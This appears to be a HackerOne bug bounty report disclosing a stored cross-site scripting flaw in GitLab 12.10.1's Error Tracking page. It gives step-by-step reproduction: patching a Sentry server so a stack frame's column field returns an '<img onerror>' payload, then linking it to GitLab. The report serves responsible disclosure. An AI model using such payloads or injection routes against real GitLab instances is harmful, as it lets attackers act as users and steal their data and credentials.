Stored XSS on the Error Tracking page
HackerOne report #859888 by mike12
on 2020-04-26, assigned to @jeremymatos:
Hello Gitlab!
Steps to reproduce
- Set up a Sentry server or just use this server: http://REDACTED .
-
Install Sentry Server, use this doc
-
Connect to the Sentry container:
docker exec -it sentry_onpremise_web_1 /bin/bash
-
Install Vim:
apt update && apt install vim -y
-
Open
stacktrace.py
file:vim /usr/local/lib/python2.7/site-packages/sentry/interfaces/stacktrace.py
-
Replace
"colNo": self.colno,
with"colNo": "<img src=x onerror=alert(1)>",
on line 210def get_api_context(self, is_public=False, pad_addr=None, platform=None): from sentry.stacktraces.functions import get_function_name_for_frame function = get_function_name_for_frame(self, platform) data = { "filename": self.filename, "absPath": self.abs_path, "module": self.module, "package": self.package, "platform": self.platform, "instructionAddr": pad_hex_addr(self.instruction_addr, pad_addr), "symbolAddr": pad_hex_addr(self.symbol_addr, pad_addr), "function": function, "rawFunction": self.raw_function, "symbol": self.symbol, "context": get_context( lineno=self.lineno, context_line=self.context_line, pre_context=self.pre_context, post_context=self.post_context, ), "lineNo": self.lineno, - "colNo": self.colno, + "colNo": "<img src=x onerror=alert(1)>", "inApp": self.in_app, "trust": self.trust, "errors": self.errors, } if not is_public: data["vars"] = self.vars
-
Exit from the container
-
Restart the container:
docker restart sentry_onpremise_web_1
-
Create a new Sentry project, use this doc
-
Capture an error using Sentry SDK. Use docs: Initialize Sentry SDK and Capture your First Error
-
Generate a Sentry auth token, use this doc
-
- Run Gitlab:
docker run --detach --hostname gitlab.example.com --publish 443:443 --publish 80:80 --publish 22:22 --name gitlab gitlab/gitlab-ce:latest
- Create a new Gitlab project
- Go to
Settings->Operations->Error Tracking
and connect Sentry to the Gitlab project- Check the "Active" checkbox
- Sentry API URL: http://REDACTED:9000 (or your Sentry server URL)
- Auth Token:
REDACTED2
(or your Sentry auth token) - Project:
Sentry | javascript
(or your Sentry project)
- Go to
Operations->Error Tracking
and open details for an error.
My GitLab version
root@gitlab:/# gitlab-rake gitlab:env:info
System information
System:
Current User: git
Using RVM: no
Ruby Version: 2.6.5p114
Gem Version: 2.7.10
Bundler Version:1.17.3
Rake Version: 12.3.3
Redis Version: 5.0.7
Git Version: 2.26.2
Sidekiq Version:5.2.7
Go Version: unknown
GitLab information
Version: 12.10.1
Revision: e658772bd63
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 11.7
URL: http://gitlab.example.com
HTTP Clone URL: http://gitlab.example.com/some-group/some-project.git
SSH Clone URL: git@gitlab.example.com:some-group/some-project.git
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 12.2.0
Repository storage paths:
- default: /var/opt/gitlab/git-data/repositories
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
Git: /opt/gitlab/embedded/bin/git
Impact
An attacker can:
- Perform any action within the application that a user can perform
- Steal sensitive user data
- Steal user's credentials
Attachments
Warning: Attachments received through HackerOne, please exercise caution!